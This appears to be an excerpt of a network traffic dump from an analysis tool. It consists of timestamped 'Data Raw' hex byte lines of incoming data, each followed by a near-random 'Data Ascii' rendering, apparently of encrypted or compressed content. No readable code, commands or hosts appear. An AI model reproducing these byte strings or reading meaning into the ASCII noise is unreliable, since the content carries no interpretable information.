                                                                                                                                                                                2021-11-11 11:26:10 UTC2740INData Raw: 73 ed 6a 6f 0e 0d 7d af 33 f1 e8 ca aa c3 ea 41 92 6e 3f ba dd c5 61 ec 34 1e b8 5c 75 b0 96 95 c4 4f 08 b8 13 23 2a 6b 0d 5b 09 81 ee 1b dc b6 05 17 2b e0 b7 d3 f3 e7 ab 4e 4f 36 af ab ff 7b 9b 78 53 e0 2e 3f 22 94 4d 3f 93 9f e6 5d d6 bd 8a 44 8e 0a 97 d2 19 6d 02 fe aa 40 05 b8 8b 0a 31 69 c4 a4 83 f5 1f c9 66 a7 f5 15 d2 90 43 08 fa 54 20 e5 78 18 9d d3 e4 20 ff f0 69 74 85 05 9d 7e 5d 50 5f 95 bd 33 96 18 b6 db fc aa b9 84 a0 97 67 2d 10 d4 f2 84 e9 d8 65 ff ab b6 7d f5 92 3e 13 35 74 7d d6 0b 82 86 e4 1d 03 88 5c d7 85 de 6a 4f ef 0c 9a 7e 7d df 9f 1a e5 71 55 7e dd 67 4e 76 f5 10 42 09 40 6a 98 60 21 c4 3e 73 eb 61 79 bb c5 e8 4d 74 b0 dd 93 71 93 81 e6 4c d2 79 26 d4 55 dd e3 7f 3f 4b c6 0e fb ed f3 15 ef b0 71 07 96 f0 dc 37 bd 61 54 9d a3 50 35
                                                                                                                                                                                Data Ascii: sjo}3An?a4\uO#*k[+NO6{xS.?"M?]Dm@1ifCT x it~]P_3g-e}>5t}\jO~}qU~gNvB@j`!>sayMtqLy&U?Kq7aTP5
                                                                                                                                                                                2021-11-11 11:26:10 UTC2741INData Raw: e1 c8 17 4c 17 aa 81 d7 cd c4 49 1c 7d 08 71 3e 77 eb a4 00 80 c0 f4 d7 49 0c e5 40 e0 32 7c c1 57 47 63 fe 44 2a c3 06 45 99 0c 62 52 9f d0 a4 b5 94 9e d7 fa 3b f7 17 f4 75 49 12 47 92 53 0e 7e 87 ac 62 57 32 17 41 b7 ae 61 7f 49 3b 25 fa ed 44 c3 99 5e 08 b5 7f a2 9a fe 30 a1 71 f1 e6 15 6d fc 4d 6e b0 d8 49 6a b6 83 69 29 ec 83 99 7d 94 90 f1 12 c8 42 a0 72 6a f2 f9 59 b7 49 e2 67 95 00 88 07 24 78 bf 1e 9f 09 e1 c8 d5 1c da 22 fe 49 84 8e 42 83 f9 cc 54 67 b4 65 54 45 d2 37 a5 b6 b5 5e 70 8d e1 0e a7 7b 1f 6a f8 10 4c f5 c4 de fe 14 ae 16 1d 72 b8 2d 69 7e 1f 5e 0e bf ee 6b 00 6a a9 49 f9 ef fa 13 ea 98 89 96 de 3a b9 19 c9 0f 12 81 d6 6f 28 c3 59 5d 2e 10 9a b4 22 fc 84 87 b8 54 b7 1f 61 b5 cf 93 8d 93 a4 b4 7f dc 22 84 2e 6f 7e 97 c8 cc c9 5f 0f 94
                                                                                                                                                                                Data Ascii: LI}q>wI@2|WGcD*EbR;uIGS~bW2AaI;%D^0qmMnIji)}BrjYIg$x"IBTgeTE7^p{jLr-i~^kjI:o(Y]."Ta".o~_
                                                                                                                                                                                2021-11-11 11:26:10 UTC2742INData Raw: 46 b7 91 51 f8 99 88 2b 41 f9 bb 27 1a 7b 70 53 86 bf 4d d6 ea 70 d8 c4 02 4e 5e 61 ce 88 f3 62 0e 2e 1d 61 ca b3 af d0 8c bb a8 43 4e e6 d2 60 8d e1 37 8c 40 9e 93 7f 40 d1 65 b3 e8 2d 35 bf a6 33 7d 52 c5 df 19 3f ad b3 2a f7 df 31 36 74 69 e9 80 c7 6a 31 92 9d b8 98 e7 89 59 e6 f6 30 b7 0d b2 79 cc d1 a0 6f f0 60 7b 76 df 6d 48 93 42 46 5e 32 c1 d5 79 56 70 7d c1 f6 5e 4c 2f b3 49 91 4a ee aa 8f 3f 9f 4b a3 39 4b 8b 61 10 51 bc b4 d6 9e d9 06 e1 d3 c7 92 dd bd 7b 0b 51 df 56 96 e1 51 3d d5 c9 61 54 60 c5 b9 43 e7 f1 49 0d f5 ea 1f 6e 7a b5 e6 d9 31 49 97 e2 a0 cf d1 d4 f7 ca f5 40 12 14 f1 06 f5 81 9f ce 94 69 44 18 19 72 76 39 6e 69 6f 47 14 60 58 69 9e c5 18 0b cd 42 b1 4d 27 56 64 95 30 ac fc ee 68 81 99 6a 95 1d 7b eb e4 26 10 15 d7 58 3b ca 3f 1f
                                                                                                                                                                                Data Ascii: FQ+A'{pSMpN^ab.aCN`7@@e-53}R?*16tij1Y0yo`{vmHBF^2yVp}^L/IJ?K9KaQ{QVQ=aT`CInz1I@iDrv9nioG`XiBM'Vd0hj{&X;?
                                                                                                                                                                                2021-11-11 11:26:10 UTC2744INData Raw: 08 65 db 99 e5 c9 e9 05 aa 57 d5 9b 43 ff c6 6c 06 74 e1 e7 43 c1 69 d3 94 57 1d 5d 61 47 61 f7 9a 98 b4 c0 88 17 04 95 4d 85 05 b9 b7 cd 69 c8 15 b3 72 86 62 22 97 fe 6e 56 88 ae 47 65 20 1c 55 8a 37 0f 4d 81 21 a8 85 f1 5d 92 b5 99 6f 45 7f 16 81 41 63 e8 2b 2b c7 50 6f 78 89 64 84 a4 d9 bd b9 f3 82 8e 93 a4 f2 bd f1 e2 63 a4 ac eb b5 6d 51 b8 e6 d3 33 ca 48 f1 b9 e4 bf 01 6c 77 62 4b 35 10 8b d6 c4 f5 d5 81 98 d8 b6 d3 22 e8 af 3e 14 f1 77 c5 74 8e b3 c9 63 02 39 9e 15 ea 00 fe c0 da 5a e9 e6 4c b9 f4 51 17 17 9b d2 23 dd 39 05 1c 11 b5 76 06 70 5c 6b ad 69 3a 38 1d 73 08 76 65 85 62 2c b8 1e ea b5 b4 29 e7 6b ae 14 4e 4d 19 01 fa fe 37 4f 37 48 cb a8 05 ab 3c 08 97 b9 c2 f6 76 2a ce 42 5a ce 4e b5 74 61 c6 79 34 1b 81 cd f4 db 63 9f 9d f6 7d e8 38 40
                                                                                                                                                                                Data Ascii: eWCltCiW]aGaMirb"nVGe U7M!]oEAc++PoxdcmQ3HlwbK5">wtc9ZLQ#9vp\ki:8sveb,)kNM7O7H<v*BZNtay4c}8@
                                                                                                                                                                                2021-11-11 11:26:10 UTC2745INData Raw: b5 02 40 ae ad 78 98 db c0 bc ef c4 6f 52 10 82 75 37 5a cb 01 0f 0a 1d 74 1c 9c 54 84 d2 e1 c1 9f 7f 2e 61 b6 37 5e e9 cd 38 92 e4 4e e7 97 14 87 7c de 75 22 2b db b5 8f 77 1c 82 8e 78 7f 1f 79 47 eb dd 73 5f bc 00 12 52 6f 40 1f 4b 1a 74 0a 89 95 53 9b 6f 29 33 64 85 af b1 05 73 f2 db ed 8f ab e9 8b 70 5d 45 ab b1 bb 6b f1 1a 94 07 19 bd ad 85 df f5 af 72 e8 cc 9f 89 21 34 b8 8d 5a 88 4b 33 32 a0 21 18 cf a9 aa 50 09 1e 51 7d 69 42 ae 73 4d 2c ca 84 e8 40 66 31 dc 13 76 00 59 8c 86 91 e1 f7 fe 55 64 33 8a b8 d1 1f 75 b1 7a 37 e6 10 13 fd c3 ad 2c 4b f6 d7 07 35 4e e8 f8 60 95 b2 21 95 13 e6 b7 a0 f2 65 b9 c8 62 ed d6 98 d2 f1 2b a1 72 ae 2c 0d 2e 0d c2 c6 aa fc 91 9a 3f 61 69 d8 06 e4 d7 b9 8a 0a a9 a5 16 fc 4d be 57 df f9 48 b4 86 ae 0b db 8b 1d 10 84
                                                                                                                                                                                Data Ascii: @xoRu7ZtT.a7^8N|u"+wxyGs_Ro@KtSo)3dsp]Ekr!4ZK32!PQ}iBsM,@f1vYUd3uz7,K5N`!eb+r,.?aiMWH
                                                                                                                                                                                2021-11-11 11:26:10 UTC2746INData Raw: c4 1b a7 44 e7 3d 32 49 93 90 e9 64 6a 9f 3c 5d 47 34 13 4d 6f f4 1c 5a 04 74 25 8d 20 96 6b 0b 7c 28 55 ce 8c 36 c7 4e 6f 27 54 27 42 60 41 b6 1b 4f f8 a4 c8 ce 7b fa 7f fc 53 dc 4a 0b 60 b9 4a ce 7d a9 4b e4 b8 98 10 d1 e6 17 a9 5c 09 55 4a da e5 0a 7a 33 e4 85 4b 68 2f c1 91 ca 31 1f 01 63 d1 fa cd a6 10 8b 82 51 45 a5 61 0c c7 bd 71 36 82 9d 0e 73 0a a3 ab b8 56 63 94 84 6e a4 06 ea b2 6e 0f e3 e5 1c e4 5c e2 1e d1 06 2c c4 12 a8 ed ba 3f 0e f3 89 41 00 97 4c f2 5e 74 c1 48 7f 3a f2 be 1b d2 ba 4f e0 b0 55 d6 41 65 1a 6e 96 13 eb 0d 72 58 50 13 27 e1 32 15 f8 17 b9 40 c0 68 87 da 5b 94 ab f6 8a 26 c4 b5 85 81 dc ad c7 d7 b9 e4 d5 2d d7 fb 5a 77 ae ff b0 e9 96 f3 d5 5e 6d 76 1b 6e 2d bb 44 24 f1 be 2a 64 77 b7 83 48 a2 34 5f 81 fa 06 c1 6d bc 45 ee ea
                                                                                                                                                                                Data Ascii: D=2Idj<]G4MoZt% k|(U6No'T'B`AO{SJ`J}K\UJz3Kh/1cQEaq6sVcnn\,?AL^tH:OUAenrXP'2@h[&-Zw^mvn-D$*dwH4_mE
                                                                                                                                                                                2021-11-11 11:26:10 UTC2748INData Raw: 6c 63 8b 5e 8a 88 fc 8c 74 b9 65 45 3d 9f 19 12 a4 df 26 32 58 96 11 62 a8 87 90 72 1c 02 e5 88 e0 a1 6b b3 ab 70 29 24 8c df 8e ac 47 8f cc 06 8e 69 f7 04 af 6d da f0 2e 60 fa 8c 0e 70 4b 72 76 cd 6c 7d 14 98 85 5e 62 91 06 2d 02 44 a9 ce c4 a1 eb 20 10 04 79 5d b9 90 15 b7 34 5d 17 b2 fc 61 d5 21 fb 60 65 f6 6a 20 e1 b2 2e 46 cf 0b f2 69 e9 c6 43 65 d9 87 97 d1 4c 78 86 84 f5 08 b9 cf 2b 1b ba 8a d0 a3 b8 12 23 95 e7 87 76 77 e7 ba b1 c4 0b 57 8a ad d8 86 e2 88 e6 62 9b 78 d9 55 a7 ee f2 c0 52 80 2a 9f 4c e6 d2 2a 09 6f cf a1 c2 2f f5 8c df 97 59 a5 a5 ce c2 e1 d7 d4 ec 90 28 80 3c 17 4a 69 d9 5f 4d b4 c5 ce 2b 92 c0 67 cc e9 fe b2 9d d4 b0 01 92 b9 f6 89 4c ae 81 2a e5 1d 93 8d 68 10 78 db 61 05 5b 39 df 43 91 02 ad 74 37 b9 ec 68 29 08 e5 b8 b4 6d d2
                                                                                                                                                                                Data Ascii: lc^teE=&2Xbrkp)$Gim.`pKrvl}^b-D y]4]a!`ej .FiCeLx+#vwWbxUR*L*o/Y(<Ji_M+gL*hxa[9Ct7h)m
                                                                                                                                                                                2021-11-11 11:26:10 UTC2749INData Raw: 50 f2 2a 47 7e fe b0 42 31 36 28 43 dd af d9 80 14 c3 b5 2e ac 7c ea 19 6e 8c 14 ea 65 74 6c e3 14 c5 6f f8 5e 18 0f 5e 1e 23 fd 8c e2 3e aa 65 09 b9 1e e0 31 68 2a a0 6d 50 7e bc 55 c9 1a b6 d2 e7 46 45 3d ed 62 50 17 37 4f a1 66 4f bc 63 80 fc 3e ee e5 a9 ce 01 f6 87 ee f9 f5 c5 4c 79 72 53 d3 41 39 e3 46 4e 0a de e3 d7 71 e4 52 7b 67 c1 f1 62 23 1a 71 37 dd c1 e6 f1 7e fa 07 f6 a1 c1 49 7d 69 1e 03 d8 a5 1a c5 bc 53 b9 f7 11 ba c3 2b 1f 64 6f bd 86 96 bd 28 9f 3b ef 7a 92 de 0b 45 8d 55 14 81 c2 78 62 14 0d 68 20 a6 67 84 08 99 ac 26 ea 7c 45 66 95 7c c5 be 99 0d a9 8b 78 db af 7f 04 18 c5 58 55 ec 80 f9 5d cf bd 54 5e 09 5c 63 e1 a8 37 b8 1b 3b e6 5a a6 0a ca d7 0c 97 1f 39 be 4d d1 df 0d e8 4a fa 24 b9 4e f4 fd bb f2 d7 b6 13 65 3b 75 54 f3 a6 01 77
                                                                                                                                                                                Data Ascii: P*G~B16(C.|netlo^^#>e1h*mP~UFE=bP7OfOc>LyrSA9FNqR{gb#q7~I}iS+do(;zEUxbh g&|Ef|xXU]T^\c7;Z9MJ$Ne;uTw
                                                                                                                                                                                2021-11-11 11:26:10 UTC2750INData Raw: a9 16 bc e6 44 82 37 4e b9 96 68 b1 f0 97 75 46 08 5a c3 71 b5 30 7e 51 66 52 7c 44 c4 f6 6e 6f 42 57 b0 3e a2 13 6e a5 77 b4 80 92 18 64 32 78 8c b9 ed d8 62 a0 ca 72 5d e2 65 c4 87 90 bf e1 eb 97 6d 61 64 cb fa af 92 fc f6 6c ea 7f 31 6a 58 f3 99 df 9a 65 37 ad 81 56 ae 04 f3 62 23 4a 79 0d 49 6a 86 33 f7 4a e6 f6 29 58 ea a8 4d e2 7e 06 a8 18 20 36 2e ca eb 69 4f 72 a1 fc 1e fb 37 b2 36 7f b7 9d 90 11 db 07 31 95 fd c7 23 57 51 39 bd fc 1b 11 5b ad 89 14 9e 78 61 49 be 41 b6 7a 2b 71 f1 1a 8e e4 82 3b b1 f5 b0 6f b3 09 b5 e4 c8 ed b8 0d a7 80 99 56 0d 77 d2 48 20 f9 94 28 66 25 58 1b dd e4 84 a4 79 77 e6 38 6e 76 fa 35 e4 37 5b 10 8f d0 d9 f0 e8 7d 91 8c ec 99 26 b1 8d 68 94 b1 24 f8 6c 6a 4e 00 63 ae 58 4a bb 3b 00 e8 78 2c 91 71 b4 24 1b de d7 33 26
                                                                                                                                                                                Data Ascii: D7NhuFZq0~QfR|DnoBW>nwd2xbr]emadl1jXe7Vb#JyIj3J)XM~ 6.iOr761#WQ9[xaIAz+q;oVwH (f%Xyw8nv57[}&h$ljNcXJ;x,q$3&
                                                                                                                                                                                2021-11-11 11:26:10 UTC2752INData Raw: c3 48 b3 04 17 7f 15 e9 a5 b6 d1 dd 26 88 92 29 0b a7 7b 0c 05 46 8a 39 69 a8 ee f9 7f 2e 2a da 7a ce 09 cf 50 e1 43 bc 69 7d 39 f4 01 61 77 03 41 c2 7c aa fc e6 6c 88 44 8f 86 e6 be 2c 72 98 ab 95 ed b0 2a e1 30 dc e3 e2 3f 25 51 f1 fc 5e a0 75 01 fb 62 c8 d6 47 ad a3 e4 fe 7f 96 7a 9a 1d 1f 24 f0 f0 e6 eb 61 34 45 7e 16 f8 12 4f 23 97 d4 e5 c2 08 a4 50 9b 53 ac 69 4a 70 b7 d1 a1 1d 03 f0 3f d0 ef d5 e6 49 24 4c 29 75 e3 6e 66 06 a8 55 82 38 33 7c e2 7d 3a ef 59 bd 90 07 e8 61 b7 e1 f9 73 67 7b c2 1a 4b 95 bf b7 af f5 18 29 ea ec a2 7f ef 9d 91 83 f7 08 2c be eb c0 a8 b7 b5 9a b8 eb 48 14 0f 34 f9 71 a1 97 c0 93 77 f8 39 01 a2 f8 b5 15 6c 57 ee 69 63 90 ce 1a 42 a9 45 45 85 b0 fc 12 2c 90 83 9c 04 58 55 e9 2a 30 29 73 4a 62 60 ee 40 74 89 b4 6c 0f 86 dc
                                                                                                                                                                                Data Ascii: H&){F9i.*zPCi}9awA|lD,r*0?%Q^ubGz$a4E~O#PSiJp?I$L)unfU83|}:Yasg{K),H4qw9lWicBEE,XU*0)sJb`@tl
                                                                                                                                                                                2021-11-11 11:26:10 UTC2753INData Raw: c8 a1 3e 3b 43 81 9e d6 42 e5 92 46 08 19 f7 77 e8 6a cb 08 84 a6 83 47 23 a3 91 46 d3 7d 4b 4a 4f 45 92 04 60 b1 ec a7 4e 13 7e 57 ba 51 98 d8 51 34 ff e0 88 f5 ca 2f 1e 8e 32 7e e6 a1 14 67 51 40 cd 29 8b 9c d1 d2 22 d3 91 ea cf 49 4c 9e 98 73 4c c1 8f 9d aa 10 a3 33 c0 09 e1 dd 08 fe f2 ce c1 d6 28 a5 f4 58 29 9c e1 24 91 4c da 51 d6 81 6f 1a e7 09 32 42 fa ab 08 e7 d8 54 42 5e a1 ba ef 4d ab bc a2 ae 77 92 46 57 e4 d8 60 42 03 21 b4 b4 b9 d0 12 1f a7 2c b6 62 56 2b 83 c6 e1 65 91 87 53 ba c6 f1 2a a4 59 d7 59 ab 0b 2f 7e 73 62 2f 06 6e e9 a9 6d 65 6b 09 b7 50 51 41 99 ab 69 bf ee f5 df 69 06 70 c2 ba 15 4f 6a 49 66 08 eb ff 94 e0 fb 8f 4f 63 c9 5e 28 a9 5c 97 67 d5 06 de 3f 3c 7b 2e 33 96 2f 53 4a 59 2f ea e6 1a 6b 44 96 02 68 01 3f 7b 18 10 75 77 5f
                                                                                                                                                                                Data Ascii: >;CBFwjG#F}KJOE`N~WQQ4/2~gQ@)"ILsL3(X)$LQo2BTB^MwFW`B!,bV+eS*YY/~sb/nmekPQAiipOjIfOc^(\g?<{.3/SJY/kDh?{uw_
                                                                                                                                                                                2021-11-11 11:26:10 UTC2754INData Raw: df 49 21 5a 61 ed 97 ad 51 42 b0 6c 0a 7e 8e 03 41 01 b2 e5 1e c2 0e eb df fd 58 bc 29 d8 fa d5 a1 e9 0a f0 21 a6 2a 22 4b c1 16 fa 55 9f f7 27 a7 8d f5 7e 7a c1 db e5 77 c9 7e be ec a9 18 36 b2 b2 f5 05 7b 61 bd ca 11 69 2f e2 79 87 3f 8c 76 d8 fe 06 ba 52 99 51 7d 53 52 7e 5e df f8 eb 62 66 7d a7 01 ce f1 e7 42 d4 80 b2 79 c1 73 fa 61 2a 65 f1 03 df 60 6b 75 28 30 92 4a 7d 2a 90 95 96 bf 1e 28 bc f0 26 13 5f 68 a4 6b d7 40 8f 97 26 42 c4 97 a3 8b 23 e2 29 44 1e b6 e9 32 af a7 4c f1 2a af c9 7a 27 d5 67 50 88 09 b5 87 86 f9 a1 a7 26 72 bf 4c 36 f0 e9 9f 2e 6a e9 fc b6 be 81 41 51 a8 5d 12 2e 73 e1 bf 2e 1e 81 ad c5 9d 19 22 5a 65 49 77 4b a4 49 2b 5c b2 21 30 26 62 c1 72 86 e0 f5 71 d6 2e a9 bf 3c 5f 66 ad 5d 0d 4d 45 3b 27 ad 90 fa c5 eb 13 c8 38 b9 6b
                                                                                                                                                                                Data Ascii: I!ZaQBl~AX)!*"KU'~zw~6{ai/y?vRQ}SR~^bf}Bysa*e`ku(0J}*(&_hk@&B#)D2L*z'gP&rL6.jAQ].s."ZeIwKI+\!0&brq.<_f]ME;'8k
                                                                                                                                                                                2021-11-11 11:26:10 UTC2756INData Raw: fe cf 17 64 5c ae b6 d7 85 fd 7b ba 3d 92 38 06 89 06 99 0c e4 7f dd 61 61 a6 ef 70 2f 11 a2 24 2b dc 7e 6f af a0 a5 40 50 cf e1 83 8e 93 33 ab b0 e1 34 8c 87 40 71 f4 50 c0 98 d7 8c 15 30 16 2d 17 34 65 85 da 41 c9 8d 11 ec 95 d1 b0 b6 94 49 0f 88 5c 6d 4c ab 30 88 9d 91 43 f9 a8 c1 38 5d f5 e3 9b 9c ed bc f8 b4 b8 f2 3d 40 a8 36 93 48 5f ae 14 9f 4c ee 2c 6c ed 02 2e 91 3f 21 61 3f 25 de 70 cd 74 8d 41 26 97 19 a8 6a 04 6a 84 da 20 ae 3e 91 7e 51 12 a2 ad bc d8 6e 6b fe 53 ca c2 06 9e 1f 01 cf 76 05 77 4f f1 8a 68 db 0a 0c 49 29 9d e9 97 ca e0 29 6c 3a e9 0e 93 98 ab c1 61 44 63 29 53 2e 53 9a df ef 9f a4 37 89 77 e9 1b 18 1f f6 56 7b 75 7e 06 33 95 a8 28 b7 24 d0 f0 a4 7f 8a 37 33 a7 b0 43 2c 72 e1 d2 36 68 8c ef f4 48 76 7a bf 79 61 b3 28 1c 11 f4 36
                                                                                                                                                                                Data Ascii: d\{=8aap/$+~o@P34@qP0-4eAI\mL0C8]=@6H_L,l.?!a?%ptA&jj >~QnkSvwOhI))l:aDc)S.S7wV{u~3($73C,r6hHvzya(6
                                                                                                                                                                                2021-11-11 11:26:10 UTC2757INData Raw: c4 85 d0 17 4d d0 75 0d b7 b4 eb 9d be c0 0e c4 29 dd 7a d3 74 c0 26 6b d2 d3 bf bd c6 ce c9 e4 c6 a8 b6 c1 0e 9f 9f df 9e 6f 51 b8 0b cb 4c 51 b3 eb f9 78 e1 d5 32 47 ff 26 5d e4 88 d0 43 be b7 b5 a4 e5 35 5f 6e e9 c9 90 fa 7e 9b 54 0d 84 9b eb 6a 8c ef a5 ed 89 02 62 c1 12 6e 94 91 fc a8 b5 69 69 cb ba 37 e4 1e 88 57 78 3b 26 70 8c 51 b6 69 3c ee 2a 4a 1d 70 84 80 2d 96 be e8 5f c9 ed d9 9d 78 84 95 ea 6f 5c d4 68 75 56 fb f8 38 ea 5c cf 4c e8 a4 fb 7f b8 09 f8 67 90 5e ea 60 b1 e5 91 01 59 2f 21 aa 0c 37 8d c9 9c b0 b9 b2 87 5e 10 8b 8f 77 79 26 e9 de d2 15 71 1c c6 92 6e 10 a2 26 b0 09 8c 70 1f 5c 9e 09 90 aa 05 95 8b 6b 69 b3 4e 72 44 b4 b3 84 f6 5f b1 42 34 35 d5 39 a7 79 78 d7 80 6e 4f 37 f3 b3 b1 97 dd 5d ea ec 9c a9 a1 34 fc e7 e5 b9 e0 15 70 6b
                                                                                                                                                                                Data Ascii: Mu)zt&koQLQx2G&]C5_n~Tjbnii7Wx;&pQi<*Jp-_xo\huV8\Lg^`Y/!7^wy&qn&p\kiNrD_B459yxnO7]4pk
                                                                                                                                                                                2021-11-11 11:26:10 UTC2758INData Raw: 81 81 1d 61 87 dd 1d 63 b0 1a 33 b7 52 a2 43 29 bf 3e fd 87 36 02 a5 d9 f6 67 ab 7b 53 29 b1 40 78 3e b5 be 88 c5 15 6a 08 c5 f5 6f 9a 06 c3 65 e9 93 e2 25 c6 ea dd 5d 51 a2 a1 e1 43 64 31 f5 e1 89 2f 27 89 8d fd 0f 19 06 49 48 43 85 c3 7d dd e1 37 5b be 3c dd 17 c4 99 e5 84 45 9d 7d f5 09 5a 85 df 3c 90 a1 20 9a 0a 1b 3d 2a cd e6 a0 2c c2 5b 53 a1 25 ec 13 3c ed 22 a3 40 cc 53 7d a0 e7 53 5b 91 b7 53 45 21 6d b1 6b 24 d5 79 79 85 f0 9f 90 34 73 07 3b ef ea 0d 58 40 79 77 c7 ae 1a 5c c3 ab df 75 33 46 3e 6a b6 2f ff 79 28 ca d2 52 59 fe a2 42 90 38 69 ca b4 cf 75 ab 49 1c d5 bf 3f 01 2b d8 dc cd e4 26 cc ea e7 09 d5 79 bd 2a bd 3e df 0d b3 67 2d 45 ea f4 97 9e e7 b3 9f 6a a4 62 53 5e 14 fe 95 50 ae 2e 3b 4e 3a d6 37 86 32 25 84 e9 08 2d f7 de dd f7 48 d4
                                                                                                                                                                                Data Ascii: ac3RC)>6g{S)@x>joe%]QCd1/'IHC}7[<E}Z< =*,[S%<"@S}S[SE!mk$yy4s;X@yw\u3F>j/y(RYB8iuI?+&y*>g-EjbS^P.;N:72%-H
                                                                                                                                                                                2021-11-11 11:26:10 UTC2760INData Raw: 0f 83 db 94 28 ea 2b 97 13 1c a8 da 75 fb 71 2e d1 28 5a 8d 22 2f d3 52 a0 cd 52 48 fa 8b eb 9a 1b 3d be bd 28 78 fd 08 5e fb 0c b0 46 ee bf 81 48 d1 34 b0 8c 81 f5 b8 f5 bf e9 ea ad 19 4f 7f 4b 7d 56 1b 57 3f 68 b5 f0 b2 38 88 6d 7f d3 8c b4 85 e0 b2 d4 f9 55 b2 a9 fd 23 e2 a4 a2 8f c5 47 ac 3b 7a 82 81 70 ab fe 2f f4 8e 39 1f 32 8a 4d 67 b4 fe d5 0d 5a 86 a5 50 7d e8 72 fb f4 3c 60 95 51 a0 e8 57 85 90 fd 6f 70 55 ad 8c 7b f3 75 54 30 6d 9a a9 4a 84 f1 9a ac f2 8f 1d 9b c3 ad ed cb 0a 33 de 70 e0 e1 ff cd 91 76 6c f6 ce 5f 1e d3 48 95 41 f0 b6 bc ea a3 72 be 20 70 b4 88 f0 60 fe d6 7d 46 56 d5 1c 84 ae 38 6a 9d 3f dd 1b 59 b0 b3 e7 e3 3c ad b3 98 f1 0e bf b7 66 7e 67 36 57 76 b5 70 ae 75 93 f5 f7 d2 f2 5a 08 a9 95 50 3c 59 83 97 5d ac 8d 89 e0 b8 b7 49
                                                                                                                                                                                Data Ascii: (+uq.(Z"/RRH=(x^FH4OK}VW?h8mU#G;zp/92MgZP}r<`QWopU{uT0mJ3pvl_HAr p`}FV8j?Y<f~g6WvpuZP<Y]I
                                                                                                                                                                                2021-11-11 11:26:10 UTC2761INData Raw: 86 68 3d b6 df 56 fd 7c b9 b4 b5 a4 af 91 1c 49 e1 2c 55 15 aa 67 e8 0b 11 d1 ff 15 e9 a7 6b 85 e2 de 16 c8 c1 58 70 1f 2c 3c fd 51 6e a3 14 53 85 46 3f 3e e0 31 82 ae 99 8f e8 8d d3 66 5b 63 a0 bb 26 60 a8 77 46 56 63 bb b7 1a e1 5f 39 11 09 b9 4d 58 dd d0 4a ec 3e 6f c2 34 28 bb 4d 89 f1 b8 6e 65 b8 9d 8b 89 ae 56 2b 81 00 45 28 74 d0 b8 a0 f8 bc 4f 0a 1b fa fa 27 60 a5 0d 10 6f d9 09 b6 27 d8 f1 5c 5b 1d c9 14 c9 19 a0 94 95 56 e0 00 64 69 c3 21 4e c2 24 05 e2 ee ad 8f bf 83 ad 9e 99 66 63 aa 5b ff a7 af 74 b8 8b 86 3f a7 30 dd 7a 68 5b 03 97 c1 2d a9 81 81 32 39 5f 5a d8 e9 1f 9d c9 8f ca f0 b3 89 40 a1 c5 85 fc 7a 59 cd 0a ce aa 2d 6d ec 06 c4 31 5e 84 4e 76 9e d3 a7 da fd 1b 65 47 c7 fa 0d cf 44 a6 60 61 b8 9b b9 35 79 09 c6 41 18 9c ed 15 fb 5f 6d
                                                                                                                                                                                Data Ascii: h=V|I,UgkXp,<QnSF?>1f[c&`wFVc_9MXJ>o4(MneV+E(tO'`o'\[Vdi!N$fc[t?0zh[-29_Z@zY-m1^NveGD`a5yA_m
                                                                                                                                                                                2021-11-11 11:26:10 UTC2762INData Raw: c8 2d d5 64 16 51 6b 20 d4 d2 a6 cc 94 68 8c bf 77 b4 38 c0 9a 55 c9 46 f8 6b c3 34 e6 20 af b2 47 39 3b cd 32 35 ac bd 5a 73 e5 a6 73 8b ec ed ba 6c 39 04 c2 1f 4b 8b 81 2a 0b 34 84 07 51 9a 48 4e 1b dc eb 38 42 d4 37 16 ae 94 73 14 aa 5a e6 6d 8e 9f c0 aa 75 eb 6d 23 ad 38 39 f6 d7 7b 57 db a1 a4 03 fb 57 b8 6a 2a 4d 14 a7 c4 5d 5b b7 29 ad a7 a3 5f 22 a4 d0 73 83 7a ca 77 a5 fa 9e af 65 05 78 e0 f2 30 5b 2b e8 98 fe e7 0a c7 0e 3f a9 47 68 32 77 df 10 ce 01 bd c1 7d 77 28 74 12 56 1a 1b a8 fd ec 32 f3 2c c5 71 5c 4c ad 6b 32 a9 28 25 73 9d 20 9e 87 6b e5 45 aa a3 df 49 a2 7c 92 f2 ac ea b7 73 a3 a4 6f 5a 0f d0 10 5d 7a 0e 69 10 3e eb ac 07 6b 69 54 7b 3b 65 3b 1e db b8 38 a8 ca 73 31 37 aa 65 78 71 fe ab 46 31 df cf 07 d8 cd 23 04 8e 18 cd 7b 36 27 d6
                                                                                                                                                                                Data Ascii: -dQk hw8UFk4 G9;25Zssl9K*4QHN8B7sZmum#89{WWj*M][)_"szwex0[+?Gh2w}w(tV2,q\Lk2(%s kEI|soZ]zi>kiT{;e;8s17exqF1#{6'
                                                                                                                                                                                2021-11-11 11:26:10 UTC2764INData Raw: 8b 41 45 39 82 68 56 95 33 bc 61 54 8d 13 17 e8 db 43 6e 6a 62 2c fd cc 3b 4d 0b 55 e9 e4 b3 49 de d1 dd f0 33 ad 05 02 a4 e7 72 55 23 a0 31 39 3d dd cc 25 b8 47 16 0b 3a 80 a5 09 67 f0 e1 5f 15 82 d5 e0 4f 32 9c c1 68 d7 97 3b 81 a9 a6 55 7b 42 a2 47 f5 68 5a f4 d9 7d 86 35 b8 ec 6a 5b 82 f1 5c ff 73 75 f9 c2 40 15 91 02 b5 bb 9a 00 04 eb 1f 73 2e d1 0a 54 06 30 6d 24 3b 45 28 7b 8d 1e 2f be ef 32 5a 6a 91 e8 ef ef 87 fa 36 77 d3 55 69 68 e7 2e eb 9b 6c 20 c2 6d f5 25 c6 c7 11 86 b6 21 f8 4d 53 57 39 06 18 c0 3b 9c 81 35 36 92 b0 79 36 19 a2 9b 04 35 fe 79 60 71 43 81 bf 70 20 55 82 23 22 d7 d5 39 fe e9 3a 82 a3 45 d0 23 43 96 86 74 0d f5 cb 0f 6e a4 6f 12 27 a9 d2 4d ac d8 90 10 24 04 ba af 8c f1 ca 0e c2 77 b2 84 c4 3d 12 a5 50 ab 53 e8 41 91 af ff d5
                                                                                                                                                                                Data Ascii: AE9hV3aTCnjb,;MUI3rU#19=%G:g_O2h;U{BGhZ}5j[\su@s.T0m$;E({/2Zj6wUih.l m%!MSW9;56y65y`qCp U#"9:E#Ctno'M$w=PSA
